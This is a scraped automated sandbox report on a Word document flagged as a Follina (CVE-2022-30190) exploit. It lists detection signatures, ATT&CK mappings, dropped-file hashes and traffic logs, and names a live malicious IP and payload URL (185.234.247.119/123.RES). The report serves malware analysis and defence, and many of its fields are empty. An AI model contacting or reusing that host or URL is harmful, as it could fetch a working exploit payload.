Edit tour
Windows
Analysis Report
doc782.docx
Overview
General Information
Detection
Follina CVE-2022-30190
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type
Classification
- System is w7x64
- WINWORD.EXE (PID: 1168 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
MAL_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 | Tobias Michalski, Christian Burkard |
| |
Click to see the 1 entries |
⊘No Sigma rule has matched
Timestamp: | 185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628 |
SID: | 2036726 |
Source Port: | 80 |
Destination Port: | 49171 |
Protocol: | TCP |
Classtype: | Attempted User Privilege Gain |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | File opened: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking |
---|
Source: | Snort IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | LNK file: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 2 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Non-Application Layer Protocol | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 11 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Ingress Tool Transfer | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
27% | Virustotal | Browse | ||
17% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444 |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
true |
| low | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.234.247.119 | unknown | Russian Federation | 198004 | INTERKONEKT-ASPL | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 640940 |
Start date and time: 07/06/202219:43:37 | 2022-06-07 19:43:37 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | doc782.docx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 4 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.expl.evad.winDOCX@1/18@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtQueryAttributesFile calls found.
⊘No simulations
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2872757882299728 |
Encrypted: | false |
SSDEEP: | 192:y1gV9sJSP4VfWbgIvNmujrzzZxpFcPX/QoZxpFcPX/QN:RRc16Xcf |
MD5: | 526A6E497879064B79111F0EB079DC69 |
SHA1: | A0C1A4BA670B7640F1373BE69695CBB8D29602EF |
SHA-256: | BE1B8CE88A7FC126829F25E065A41BB623E975860C50196F9DEA860CA5683A48 |
SHA-512: | E7B903BAAA54CC700553DD777E855EEBC9D32C38A17FC9CDED800C74C63671EFEF1503DAD239CE059AD404FCEBE58FAD3FB5740B6A3078B21A553C1E1C02A2B0 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{90C60528-C98F-4BCE-9AB0-F5E79340A27B}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6736203037253643 |
Encrypted: | false |
SSDEEP: | 96:KTCyVFL4PGgYQIoGGXbMXGFIFiwLi9QtOwHtONXYhO4Y/:AbUPeQxGukLnhao |
MD5: | 121BD5A641D1017667991A6BED089C9D |
SHA1: | C24150EEA5B9FAAF4EA85883F4A2010E848F1258 |
SHA-256: | 8B2A4158CC6A2D08336F295074C4722095EFDE1513079CA76C7DCDDCD0CF40C6 |
SHA-512: | DF37BF55F2CA4ED734FC35B80BFF71D0D8910874E0D5A45A493310FF5A61A687418FFB87BD0EFE4139B30D9C70FB73B5C73D93E2F83673E1E30FE853763E05A4 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9891611412909485 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzLPlQ3IlFZYDn03cEVS5fIfRP+l1gYlRZ276:yPblzJQ3IlbYD03cxxIfwl1gYDZ22 |
MD5: | CCB1ED79CC6852066844CFAB96D39ED6 |
SHA1: | 4D72D31AF6234AECC4EE48EFF6E3BEAE916EF0BD |
SHA-256: | 89EE3B6935806462AD3FD99A239D72CBCED744D8EF1506C3240FA0E916A8555B |
SHA-512: | 055E3D280BEBA5DD41D25A429DBA3D40FDA5AF560804FC7E5C397BA1D70291746D03D7176D96039151F5C995FF89FF7EA93024648F61AC15968F7F6E0ED31B6C |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2885187828602524 |
Encrypted: | false |
SSDEEP: | 48:I3HCRBFG2NYJDWfDU/YCSY41oUi+ztEVXIeChj32glRrYOL0MNW9Rc5qpHWumB5w:KHCLFXO1amSBg8NyKINyK7H |
MD5: | 317DE8F3926F423F05DF5364DB71FEE7 |
SHA1: | DB169996DE45337D8A0C1A97B0EC5DAEA96D2A4C |
SHA-256: | D6F1A882FCD48BF3D86FA004105B84A1BEC310411E6BAA7C444E63414F2308FA |
SHA-512: | FCB7FA607792872C0848E5085E12F3C5690EC319EA3DBE1C5FDE6E19C67D0C7867DE70A57B68BDD0EEDD8B3579AF7C62166AEB68E88BC9B6BE374E532F3F9327 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4A9BEEDA-1620-41EC-85E7-8F2F9F4B21C8}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22152754214705603 |
Encrypted: | false |
SSDEEP: | 24:I3Ca2rcLwnM0B34x6xPXFQfE+a3AmFHD0TXJFFmZ7fhmABvDzCARnZzqZzV6Egjt:I3Ca2AUrB1FJfT3Hja/C6SzsnIsnw |
MD5: | 9D421CB4E95C534AFA4DF087D46B16C6 |
SHA1: | A552DBB3209497D1246753410028BC8AA300BE05 |
SHA-256: | DD78DDB4B96B4CEAFDCB4FC5720419CAB5F873AC58E3CC4350F94C9B6B2E348E |
SHA-512: | C3FF9888E2D64382B2FE5AB75DBD545B28B8CA0082ABF4FC0DC7480276544BBA3E21FF64625E9167FA844BA25024359205A87829A156D119C6D53D09F02F24FA |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9727198870722877 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzCROa55VlJQwXuZ1jyjlRV8S27276:yPblzCR75B/E4ZIh22 |
MD5: | FF0683B5DA4293A1DE54EDCB8D4E8C1A |
SHA1: | 58322D98937093F90642D2220C7A4A1318A4629B |
SHA-256: | 30434BFC15C74DFA64C6C8DB56C4118A9D99D913B6578D04A1825DF5CF27B2DF |
SHA-512: | 2BD5A3A95B1F607F1065F74EB1FED9EBF3EA7B7C91388E15E090644E30D875E21AEF4ADE4F8122596AEE6CB9DAA490C7E1DB3C53E80BA92AD1100799AED988EA |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\123[1].RES
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 6241 |
Entropy (8bit): | 4.836014560592255 |
Encrypted: | false |
SSDEEP: | 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47 |
MD5: | A32050027AEA96B3B70E1056490A98C9 |
SHA1: | EF28C67583C8C8048C0BAAEAD036680A60441213 |
SHA-256: | E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433 |
SHA-512: | 1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
IE Cache URL: | http://185.234.247.119/123.RES |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBBF3E02.RES
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6241 |
Entropy (8bit): | 4.836014560592255 |
Encrypted: | false |
SSDEEP: | 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47 |
MD5: | A32050027AEA96B3B70E1056490A98C9 |
SHA1: | EF28C67583C8C8048C0BAAEAD036680A60441213 |
SHA-256: | E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433 |
SHA-512: | 1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA120D60.RES
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6241 |
Entropy (8bit): | 4.836014560592255 |
Encrypted: | false |
SSDEEP: | 192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47 |
MD5: | A32050027AEA96B3B70E1056490A98C9 |
SHA1: | EF28C67583C8C8048C0BAAEAD036680A60441213 |
SHA-256: | E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433 |
SHA-512: | 1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C |
Malicious: | true |
Yara Hits: |
|
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AC1442A8-3209-457A-9C05-FC3521EE476C}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5632 |
Entropy (8bit): | 2.2195179903071636 |
Encrypted: | false |
SSDEEP: | 12:rl3bn+kF/W/mYYaiT21U/hC9KSvuQWyRnNYnRn/5Co00RnNEKn7iv9KS4CI9KS4y:rdW/NK/5QV8nNoWisg6BAKoG8noxoWi |
MD5: | 3AB3539B70A9B80798F3669AC3483546 |
SHA1: | 346E40AF0E4E582BD90E166E57A8B3A170AC4565 |
SHA-256: | 5DBE81D54C8C3CF70075824A503914BC1C8240574AA22AB7C7B7BC63E1DDD654 |
SHA-512: | A407CB94888C76D85D50239C97A6CE89BBDB5EEC8FDB5792EEF8FFE56B6110BFF2E86AECC0B7B2C765AFC91BA3A30B3426659E705919BE960A4D37A5118FE40C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2921E275-B8BF-45B2-888A-BDBD2D0A4929}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{77318D9D-F0AF-4DD2-B489-88A56CEFB392}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2130 |
Entropy (8bit): | 1.1627960907898713 |
Encrypted: | false |
SSDEEP: | 6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1PcV5:mbb2sOhYk5vnZA5Rn/YnRn/dom5 |
MD5: | 645EA66E0489C4D8B0D4877F7A930E07 |
SHA1: | 2961C4A1FDD07A4A6EFA47655C6087EB011B079E |
SHA-256: | ED0BFA2837448DD790D7C0450339FBAEF480535517847634136BF9F7F0B91468 |
SHA-512: | 0D1E3C8280255B0F329931CE8CE1810DFE32F5DA29A2FD9FE90B907A2546699B955D50519CE310BD63B5D84F5873F5FB3CCB0467FB48E47ABEA16962DC6BAACE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025623734588153504 |
Encrypted: | false |
SSDEEP: | 6:I3DPc1V27HvxggLRvhGEAflWSks3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPwuDhGEAfASk6vYg3J/ |
MD5: | B0EA46CCC2FA72CDEA1E8A970318C8C5 |
SHA1: | E8BB6DFCD4C726B015778B573CE00F8A98D190F7 |
SHA-256: | 85EA4C6C1662274426EAFFE8C190A6F109D86DDF4021D8E4A9E3198F36A551A4 |
SHA-512: | 62C38D380B430EDE994AA1561EE4CC07FD30D99D272A91D8F15B015CDA636C46605A83244CCDE01E87A132F325C7F9EB385AE7B2A9E981A845D8EB1F0B9449D8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.0256237345881535 |
Encrypted: | false |
SSDEEP: | 6:I3DPcbYRvxggLRPqv5ibXbGRXv//4tfnRujlw//+GtluJ/eRuj:I3DPGYdjy5vYg3J/ |
MD5: | 10E67C048099C90E1C0666278470E38A |
SHA1: | D5A7F4B209F9732FB77E86F8A668E1512D66C2DB |
SHA-256: | D8392841A423C66EA19FB60EA4E550FD547DE47B6A66521A05CB3FCFC5E83492 |
SHA-512: | BB2C07BF757A5CD6A874F60DD91605CC4C83918A43623466F649DD63BAE75340B2B203EFEBA155C96EEB0E22F4623A82E0D7C3382522046EC7F63302BCC8CAF1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 999 |
Entropy (8bit): | 4.520744870739846 |
Encrypted: | false |
SSDEEP: | 12:8nlrgXg/XAlCPCHaXWBlXB/eLX+WqPW/xgitCicvbz6F42NDtZ3YilMMEpxRljK1:8f/XTm3MgPW/xftJekxDv3qa+Y7h |
MD5: | 04594E11A8EF65860D389E40AB032796 |
SHA1: | AA6792F586717AD57B20FD67B505E50D5AE0E5A3 |
SHA-256: | 1BC5F3C148CE6BAFA95337883CC3B042968CD04F3BF61453FC99D46199056D8B |
SHA-512: | 049D931F8E51E9573F8B459018770975916EE6A87B1E9606BC89247CD8875C3FA9D77557D196DA4FE827AC8F3171DD6A37007FB2BABEB910FA872C01A4CDF0BA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 4.601202445739505 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlZIbFXCmxWKIbFXCv:bCSa6c |
MD5: | 538F5016C24249AC1799BBBB20B4BD97 |
SHA1: | 1B0ECD98E7D3BFECA78B00528138FA8D84F35BED |
SHA-256: | 249CC3AF3819FB4142D7A65254BD454ACF580489E19A50D71007A7E998B4A70F |
SHA-512: | E0E8040389BABFFD046E57AAD3ECFEE9A9171B4D00EC75EE3DF48710FC452C479692121776D17DCBCCC72E4A1CA0B6570484C007B282C9DBF05EDD34C9463EDA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.869060797789825 |
TrID: |
|
File name: | doc782.docx |
File size: | 10144 |
MD5: | e7015438268464cedad98b1544d643ad |
SHA1: | 03ef0e06d678a07f0413d95f0deb8968190e4f6b |
SHA256: | d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93 |
SHA512: | d134d87c28acb758b897a287a9f6ce86776f384f43ee963f52b40e173b6bfcd9dc76e5f64b9a40b93d3bf2a5b988f842c27c90611a8b4408abd9e197191e4aad |
SSDEEP: | 192:s5VReDWRPj8Iugw1Blb8VPkf+CFk4v1Y2VveFLC9FJ9Q7dlpN2:snPj8I10lD9+2Vvx9qlpN2 |
TLSH: | A3228E3ADA5508B5CAD2A275E0AC0B2AD30C42BBB73BE9CB65C653E402C85DB0F5530C |
File Content Preview: | PK.........k.T...L....'.......[Content_Types].xml...n.0.E....m.NR....,.X...~...`.l.....C ......l....sg..'.m..kp^...Q4d...H..1.X...,.(.......x6..L.;.>.b.c.!...}.A!|d,h.....i.....K,....;....1.R.M'O..U....^WF.....Ub....6W.@.....(aM..r..3e....?J(#....7..S...p |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 7, 2022 19:44:27.159992933 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:27.187441111 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:27.187530041 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:27.187803030 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:27.215111017 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:27.215137959 CEST | 80 | 49171 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:27.215202093 CEST | 49171 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.657025099 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.684343100 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:32.684530973 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.684813023 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:32.716893911 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:32.718305111 CEST | 80 | 49172 | 185.234.247.119 | 192.168.2.22 |
Jun 7, 2022 19:44:32.926908970 CEST | 49172 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.916021109 CEST | 49173 | 80 | 192.168.2.22 | 185.234.247.119 |
Jun 7, 2022 19:44:36.943603992 CEST | 80 | 49173 | 185.234.247.119 | 192.168.2.22 |
